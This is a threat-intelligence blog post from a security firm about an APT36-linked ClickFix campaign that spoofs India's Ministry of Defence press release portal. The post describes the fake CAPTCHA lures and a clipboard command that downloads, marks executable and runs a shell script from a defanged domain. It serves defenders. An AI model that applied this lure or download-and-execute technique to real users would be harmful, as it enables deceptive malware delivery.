CyberSRC Labs - APT36-Linked ClickFix Attack Spoofs Indian Ministry of Defence to Target Windows and Linux

2025-07-21

Security Team

APT36-Linked ClickFix Attack Spoofs Indian Ministry of Defence to Target Windows and Linux

Cyber Attack

On the sidelines tocyberattack from apt36 amid operation sindoor a retaliatory response onPahalgam Terror attack orchestrated by Pakistan the cyberattack campaign wasalso seen carried out by alleged TAG-140 that has overlaps with SideCopy,an operational subgroup assessed to be a sub-cluster or operational affiliateof Transparent Tribe (also tracked as APT36, ProjectM, or MYTHIC LEOPARD).Recentthreat activity highlights the continued use of official branding and visualimpersonation by threat actors to reduce user suspicion and facilitate malwaredeployment.

A campaign spoofing India’sMinistry of Defence employed a ClickFix-style infection chain to distributecross-platform malware. The malicious infrastructure replicated legitimategovernment press release formats, staged payloads via a potentially compromised.indomain, and leveraged visual deception to maintain credibility throughout theattack lifecycle.

This campaign reflects broadertrends observed in other ClickFix operations, notably the reuse of publicsector branding, hosting of malware in web asset directories, and targeting ofboth Windows and Linux systems to broaden operational reach and effectiveness.

Initial Access Vector: Spoofed Ministry Press Release Portal

During domain reconnaissancetargeting government-themed spoofing, Hunt.io identified the domain email.gov.in.drdosurvey[.]infodelivering content that impersonates India’s Ministry of Defence. When accessedvia a web browser, the domain presented a fraudulent page designed to closelymimic the Ministry’s legitimate press release archive, including a structurallysimilar layout and user interface.

URL Path Comparison

· Legitimate: /index.php/en/press-releases-ministry-defence-0

· Malicious: /content/press-releases-ministry-defence-0.html

The adversaries attempted toreplicate the Ministry’s historical press release archive, commonly listingdocuments from September 2023 to April 2025. However, only one hyperlinkcorresponding to March 2025 was functional on the spoofed page. The remainingentries displayed static placeholders marked "No Data," likely tomaintain visual authenticity while focusing user interaction on the activemalicious payload.

Analysis of the cloned portal’ssource code revealed that the site was generated using HTTrack, anopen-source website mirroring utility commonly used to duplicate legitimate webcontent. HTML metadata within the page source indicated the cloning activitylikely took place in early March 2025.

The threat actors reconstructedthe Ministry's public document archive, which typically indexes monthly pressreleases spanning September 2023 to April 2025. However, on the spoofed site,only a single hyperlink corresponding to March 2025 was functional; all otherentries displayed a static "No Data" message, suggesting theremainder of the content was either non-functional filler or intended purelyfor visual authenticity.

ClickFix TechniqueObservations

Interaction with the sole active link on thecloned press release portal—labeled “March 2025” triggers a ClickFix-stylesocial engineering sequence. Upon selection, the user is redirected to one oftwo server-side PHP scripts based on their operating system:

· Windows: /captcha/windows.php

· Linux: /captcha/linux.php

This OS-aware branching behavior aligns withknown ClickFix tactics, which tailor payload delivery and deception techniquesto the target environment to increase the likelihood of successful execution.

Linux Flow: CAPTCHA Lure and Shell Command Execution

The Linux-specific page (/captcha/linux.php)displays a minimalistic interface featuring a single blue button labeled "I'mnot a rebot"—a misspelling of "robot" that may be either anunintentional typographical error or a deliberate obfuscation tactic designedto evade automated detection and signature-based scanning.

Upon clicking the deceptiveCAPTCHA button, a shell command is silently copied to the user’s clipboard. Ifpasted and executed in a terminal, the command retrieves a shell script named mapeal.shfrom https://trade4wealth[.]in/admin/assets/js/, assignsexecute permissions using chmod +x, and immediately initiatesexecution. The domain trade4wealth[.]in used to host anddeliver the payload, is assessed to be either compromised or abandoned, and haslikely been repurposed to support malicious infrastructure.

Following the clipboard action,the user is redirected to linux-guide.php, which displays averification overlay accompanied by step-by-step instructions designed tosocially engineer execution of the script:

1. PressALT + F2

2. PressCTRL + V

3. PressEnter

The redirected page (linux-guide.php)represents the next stage of the ClickFix infection chain. It features aspoofed CAPTCHA overlay accompanied by step-by-step instructions designed todeceive users into executing the previously copied shell command from theirclipboard.

Behind the overlay, thebackground consists of a static image that faintly displays a watermark from PCRisk,a legitimate cybersecurity information platform known for publishing threatanalysis and malware removal guides. This visual element may serve as a socialengineering tactic, intended to mimic a trustworthy security interface andreduce user skepticism during the execution process.

As of this writing, analysis ofthe Linux payload (mapeal.sh) reveals no overtlymalicious behavior. Upon execution, the script simply downloads a JPEG imagefrom the same hosting directory (https://trade4wealth[.]in/admin/assets/js/)and opens it in the background. No evidence of persistence mechanisms, systemmodification, network communication, or lateral movement was observed duringdynamic analysis.

Windows Flow:FOUO Warning and mshta-Based Payload Delivery

On Windows systems, clickingthe active "March 2025" link redirects users to /captcha/windows.php,which displays a full-screen overlay simulating a government disclosure noticelabeled “For Official Use Only (FOUO)”. This spoofed interface isdesigned to create a false sense of legitimacy and urgency, consistent withsocial engineering tactics commonly employed in ClickFix-style campaigns.

The background of the pagefeatures a blurred screenshot of the legitimate yoga.ayush.gov[.]inportal, an official site maintained by India’s Ministry of AYUSH to promoteyoga and wellness initiatives. This visual mimicry likely aims to reinforcetrust by associating the page with a recognized government domain.